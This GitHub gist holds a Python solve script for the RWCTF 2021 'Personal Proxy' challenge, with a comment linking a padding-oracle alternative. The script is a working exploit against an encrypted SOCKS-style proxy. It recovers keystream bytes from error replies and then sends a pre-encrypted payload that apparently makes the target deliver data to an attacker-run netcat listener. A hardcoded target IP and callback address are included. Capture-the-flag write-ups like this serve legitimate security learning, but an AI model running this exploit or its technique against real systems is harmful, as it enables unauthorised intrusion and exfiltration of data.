Skip to content

Instantly share code, notes, and snippets.

@zTrix

zTrix/solve_personal_proxy.py Secret

Created January 11, 2021 02:19
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
  • Save zTrix/59ad1ab7a95074e66ecef8a497b25b30 to your computer and use it in GitHub Desktop.
Save zTrix/59ad1ab7a95074e66ecef8a497b25b30 to your computer and use it in GitHub Desktop.
Download ZIP
RWCTF 3rd - Misc - Personal Proxy Solve Script
Raw
solve_personal_proxy.py
#!/usr/bin/env python3
import socket
import binascii
# https://github.com/zTrix/zio
from zio import *
def recover_one(target, block):
'''
send `invalid domain request` to make socks server reply with `Host unreachable`
'''
io = zio(target, print_read=HEXDUMP_INDENT8, print_write=HEXDUMP)
io.write(xor(b'\x05\x01\x00', block[:3]))
io.read(2)
domain_length = len(block) - 7
io.write(xor(b'\x05\x01\x00\x03' + l8(domain_length) + (b'x' * (domain_length - 1)), block[3:]) + b'x\x1f\x40')
reply = io.read()
io.close()
return bytes([reply[-3] ^ ord('x') ^ block[-1]])
def recover_block1(target):
block = b''
block += xor(b'\x78\x07', b'\x05\x00') # first reply
block += xor(b'\xce\xa3', b'\x05\x00') # first 2 bytes of second reply
block += xor(b'\x09\x2b\x82\xce', b'\x05\x01\x00\x01') # first 4 bytes of second request
for i in range(6):
c = recover_one(target, block)
block += c
return block
def fire(key, target, remote_server):
assert len(key) >= 14
io = zio(target, print_read=HEXDUMP_INDENT8, print_write=HEXDUMP)
io.write(xor(b'\x05\x02\x00\x01', key[0:4]))
io.read(2)
remote_host = socket.inet_aton(remote_server[0])
remote_port = b16(remote_server[1])
io.write(xor(b'\x05\x01\x00\x01' + remote_host + remote_port, key[4:14]))
io.read(8)
encrypted = b'''
7e c2 f5 a6 54 c8 6b 20 84 2b 79 1c 1a 53 a6 09
38 32 0f 68 54 f6 ac a2 47 b9 25 c6 30 db 5d e0
ed 48 9d ca 44 a7 5b 3c f4 8c 14 c2 00 c5 bf 2e
e2 71 32 d8 02 90 5d f1 5f 4e da 52 8c d7 e4 58
5f 49 5c 22 40 25 05 d6 19 f7 81 9b aa 1c 54 62
51 06 d5 76 7d 62 db 32 e2 44 08 f9 4a 2c 44 30
db 00 89 7c 42 ff 20 db a2 e8 c6 cf 69 86 fd 1f
1a c8 88 c1 94 6b bb 65 cd c6 14 38 f0 10 d5 32
62 f9 3a 67 23 c4 56 8a b4 9b 97 41 ca 8c 56 e7
b8 aa 9a ca fe 5f cd 36 7b d7 90 d2 46 e4 24 60
b9 64 7d e8 84 4d 4f fd 57 30 44 a9 d9 1d a1 ef
af c8 e3 df a6 fc f4 44 28 53 50 38 24 53 93 2b
04 f8 42 9d ae fb 58 46 d4 c2 01 9c fe e0 f1 11
8b a3 e8 be 21 dd c0 ee b3 63 22 a6 91 3e 6f 60
bd 2b e5 9a 62 f4 40 89 35 99 bf c3 19 5e 25 78
ae 1f f2 60 88 72 6c e5 73 9e 90 40 71 01 38 ae
fe e3 4c 27 55 2e 8e 0f 62 a6 c8 d3 05 42 a4 30
77 ba ef 9a 17 2a 3e 0b ab c9 af 33 1d 17 e0 c4
70 4d 9f 0c 76 42 d4 60 30 08 c1 99 00 21 b9 a5
bd 6b 89 c8 c0 9d 60 d8 e7 5a f0 21 09 74 09 87
f5 8c ae 47 13 ca d9 2f ef 9c 0c cc 5a 09 45 22
90 4e da 75 10 bf 94 27 6e ef 5c c8 73 62 a5 64
77 ba e3 80 33 69 ea 4f f8 1c d4 df 24 74 82 76
a5 a1 77 68 41 f4 30 93 91 52 2e bf 0f a2 22 f2
0e 2f e3 3d 6b 81 f3 71 e3 54 79 ba 03 a4 d6 b5
39 c4 92 aa 92 ab da 62 cb b0 16 73 04 f2 82 6c
03 07 b5 6b a8 51 31 63 e4 67 78
'''
encrypted = encrypted.replace(b' ', b'').replace(b'\n', b'')
encrypted = binascii.unhexlify(encrypted)
io.write(encrypted)
io.read_until_timeout(3)
io.close()
target_server = ('13.52.88.46', 50000)
block = recover_block1(target_server)
print('first block:', binascii.hexlify(block))
# setup a nc server to receive flag
# nc -l 9999
remote_server = ('10.20.21.50', 9999) # modify addr to your server addr/port
fire(block, target_server, remote_server)
@Cirn09
Copy link

Cirn09 commented Jan 12, 2021

My unexpected solution (Padding Oracle attack):
https://gist.github.com/Cirn09/82f21ffcd9bb8db4917812782e2186e1
https://cirn09.now.sh/2021/01/11/rwctf2021wp/

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment